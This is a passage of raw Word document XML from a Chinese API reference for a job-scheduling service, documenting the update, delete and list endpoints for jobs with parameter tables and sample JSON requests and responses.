              <w:t>List&lt;TaskParam&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F34948" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="790D0358" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06DB99AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A36308" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="641AF3EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C34765B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="034639EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38286BB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B87385" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23AD4E04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A96A879" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT  /external/api/fastjob/job/5d1b568b67657c1b743cf33b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA0C91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"testxxxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"description"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"description xxx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"realmName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"全部主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskType"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskParams"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cron"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEnable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250CBA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A18940" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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b568b67657c1b743cf33b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"updatedTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 11:04:41"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B564F"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484"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="71D8792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3CAEA6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8FDCEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1AF93D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27D42DF5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18AC4E12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="253BC2E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B12B3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="102D3107" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F3DA56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="530BDB69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08ED3C41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30BEA1DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="删除作业"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>删除作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53E68A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BFF467" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/fastjob/job/{jobId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340FFD11"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702"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="799C126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46C535C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC6D6A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="292488AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="190B5C1D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="737C385D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F8B345A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A64688B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63D9802D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A172EAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/fastjob/job/5d1b568b67657c1b743cf33b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666144F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252611C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"executeTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 11:46:21"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"flag"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084315E"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415"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2CAA9E4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A66C096" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F70160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FC9346" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F202D79" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2886C5F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="556542BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28BE145E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74005A25" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307D2DD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D542B08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3103A5E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C8F255E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="获取作业列表"/>
      <w:bookmarkEnd w:id="199"/>
      <w:r>
        <w:t>获取作业列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A995E97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE9FB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D24005"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969"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6568"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="10740C0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1EEC20D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F975C71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC22E3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7769198E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EFD979F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71AE8201" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EBE58FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
